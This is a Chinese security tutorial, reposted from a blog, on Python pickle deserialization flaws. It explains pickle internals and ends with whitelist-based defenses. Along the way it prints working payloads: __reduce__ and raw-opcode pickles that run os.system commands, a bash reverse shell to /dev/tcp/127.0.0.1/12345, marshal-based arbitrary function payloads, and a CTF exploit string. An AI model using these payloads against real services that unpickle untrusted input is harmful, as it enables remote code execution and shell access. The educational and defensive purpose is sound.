网安教育
培养网络安全人才
技术交流、学习咨询
简介
与其他语言相同,python也有序列化/反序列化的方式
python序列化主要有pickle、marshal、json三种
pickle库: https://docs.python.org/zh-cn/3/library/pickle.html
marshal 模块更加原始,一般 pickle 是序列化Python对象时的首选。
JSON 序列化输出文本格式,可直观阅读。pickle 序列化输出二进制格式,不能直观阅读。
JSON 只能序列化Python内置类型,不能表示自定义的类。pickle可以表示大量的 Python 数据类型,包括用户自定义的类。
JSON 兼容性更好,而 pickle 是 Python 专用的。
用法
序列化
输出为文件对象:
pickle.dump(obj, file, protocol=None, *, fix_imports=True)
输出为 bytes 对象:
pickle.dumps(obj, protocol=None, *, fix_imports=True)
反序列化
从文件对象中读取 pickle 对象:
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict")
从 bytes 对象中读取 pickle 对象:
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict")
protocol 数据流格式
用于 pickling 的协议共有5种,使用的协议版本越高,读取生成的 pickle 所需的 Python 版本就要越新
只有 protocol = 0 的输出是可读的,其他版本均含有不可见字符
pickletools
分析pickle序列化数据的工具
__reduce__ 方法
https://docs.python.org/zh-cn/3.7/library/pickle.html#object.__reduce__
__reduce__ 方法在序列化的时候会完全改变被序列化的对象
如果返回值是一个字符串,那么将会去查找字符串值对应名字的对象,将其序列化之后返回
如果返回值是元组(2到5个参数),第一个参数是可调用(callable)的对象,第二个是该对象所需的参数元组,剩下三个可选
这里是用第二种返回值来构造执行命令的payload
1import pickle
2import os
3class A(object):
4 def __reduce__(self):
5 return (os.system,('id',))
6
7p = pickle.dumps(A())
8print()
9print(pickle.loads(p))
这里使用python2的话需要类继承自object,而python3则不需要
不继承object:
继承object:
有用的函数
1eval, execfile, compile, open, file, map, input,
2os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
3os.listdir, os.access,
4os.execl, os.execle, os.execlp, os.execlpe, os.execv,
5os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
6os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
7pickle.load, pickle.loads,cPickle.load,cPickle.loads,
8subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
9commands.getstatusoutput,commands.getoutput,commands.getstatus,
10glob.glob,
11linecache.getline,
12shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
13dircache.listdir,dircache.opendir,
14io.open,
15popen2.popen2,popen2.popen3,popen2.popen4,
16timeit.timeit,timeit.repeat,
17sys.call_tracing,
18code.interact,code.compile_command,codeop.compile_command,
19pty.spawn,
20posixfile.open,posixfile.fileopen,
21platform.popen
input 函数
在python2中,input函数能用执行代码
1daolgts@DESKTOP-4DDBUKG:~$ python
2Python 2.7.15+ (default, Nov 27 2018, 23:36:35)
3[GCC 7.3.0] on linux2
4Type "help", "copyright", "credits" or "license" for more information.
5>>> input("")
6__import__('os').system('id')
7uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
80
payload:
1# 反弹shell
2a='''c__builtin__nsetattrn(c__builtin__n__import__n(S'sys'ntRS'stdin'ncStringIOnStringIOn(S'__import__('os').system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')'ntRtRc__builtin__ninputn(S'python> 'ntR.'''
3
4# 修改*****为自定义命令
5a='''c__builtin__nsetattrn(c__builtin__n__import__n(S'sys'ntRS'stdin'ncStringIOnStringIOn(S'__import__('os').system('*****')'ntRtRc__builtin__ninputn(S'python> 'ntR.'''
6
7pickle.loads(a)
任意函数构造
https://checkoway.net/musings/pickle/
types.FunctionType 配上 marshal.loads
1import base64
2import marshal
3import pickle
4
5def foo():
6 import os
7 os.system('whoami')
8
9payload1="""ctypes
10FunctionType
11(cmarshal
12loads
13(cbase64
14b64decode
15(S'%s'
16tRtRc__builtin__
17globals
18(tRS''
19tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))
20
21print [payload1]
22pickle.loads(payload1)
23
24payload2="""ctypes
25FunctionType
26(cmarshal
27loads
28(S'%s'
29tRc__builtin__
30globals
31(tRS''
32tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')
33
34print [payload2]
35pickle.loads(payload2)
pickle.loads(payload1)
1import base64
2import marshal
3import pickle
4
5def foo():
6 import os
7 # os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')
8 os.system('whoami')
9
10payload1="""cnew
11function
12(cmarshal
13loads
14(cbase64
15b64decode
16(S'%s'
17tRtRc__builtin__
18globals
19(tRS''
20tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))
21
22print [payload1]
23pickle.loads(payload1)
24
25
26payload2="""cnew
27function
28(cmarshal
29loads
30(S'%s'
31tRc__builtin__
32globals
33(tRS''
34tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')
35
36print [payload2]
37pickle.loads(payload2)
类函数
payload:
1payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('id',):arg, '__module__': 'os'})())
1>>> import new
2>>> payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('id',):arg, '__module__': 'os'})())
3>>> payload
4"(S'id'np1niosnsystemnp2n(dp3nb."
5>>> pickle.loads(payload)
6uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
70
手动构造 pickle code
前面说到 protocol = 0 时 pickle code 是可读的,也可以手动构造pickle code
https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#pickle-code
c:引入模块和对象,模块名和对象名以换行符分割。(find_class校验就在这一步,也就是说,只要c这个OPCODE的参数没有被find_class限制,其他地方获取的对象就不会被沙盒影响了,这也是我为什么要用getattr来获取对象)
(:压入一个标志到栈中,表示元组的开始位置
t:从栈顶开始,找到最上面的一个(,并将(到t中间的内容全部弹出,组成一个元组,再把这个元组压入栈中
R:从栈顶弹出一个可执行对象和一个元组,元组作为函数的参数列表执行,并将返回值压入栈上
p:将栈顶的元素存储到memo中,p后面跟一个数字,就是表示这个元素在memo中的索引
V、S:向栈顶压入一个(unicode)字符串
.:表示整个程序结束
anapickle
Toolset for writing shellcode in Python’s Pickle language and for manipulating pickles to inject shellcode.
https://github.com/sensepost/anapickle
code-breaking picklecode
https://github.com/phith0n/code-breaking/tree/master/2018/picklecode
wp: https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#
SUCTF2019 guess_game
https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game
wp: https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup
exp:
1exp = b'''cguess_game
2game
3}S"win_count"
4I10
5sS"round_count"
6I9
7sbcguess_game.TicketnTicketnqx00)x81qx01}qx02Xx06x00x00x00numberqx03Kx01sb.'''
Restricting Globals
使用官方推荐的find_class方法,使用白名单限制反序列化引入的对象
https://docs.python.org/3.7/library/pickle.html#pickle-restrict
1import builtins
2import io
3import pickle
4
5safe_builtins = {
6 'range',
7 'complex',
8 'set',
9 'frozenset',
10 'slice',
11}
12
13class RestrictedUnpickler(pickle.Unpickler):
14
15 def find_class(self, module, name):
16 # Only allow safe classes from builtins.
17 if module == "builtins" and name in safe_builtins:
18 return getattr(builtins, name)
19 # Forbid everything else.
20 raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
21 (module, name))
22
23def restricted_loads(s):
24 """Helper function analogous to pickle.loads()."""
25 return RestrictedUnpickler(io.BytesIO(s)).load()
pickleFilter
https://github.com/Qianlitp/pickleFilter/
利用对 load_reduce 函数添加装饰器,拦截了不信任的可调用对象,一定程度上减少 pickle模块 反序列缺陷所造成的危害。
https://docs.python.org/zh-cn/3/library/pickle.html
http://www.polaris-lab.com/index.php/archives/178/
http://bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/
https://xz.aliyun.com/t/2289
文:道萝岗特森's Blog
原文链接:https://daolgts.github.io/2019/09/20/python%20pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E/
版权声明:著作权归作者所有。如有侵权请联系删除
原文始发于微信公众号(开源聚合网络空间安全研究院):【安全科普】Python之pickle反序列漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论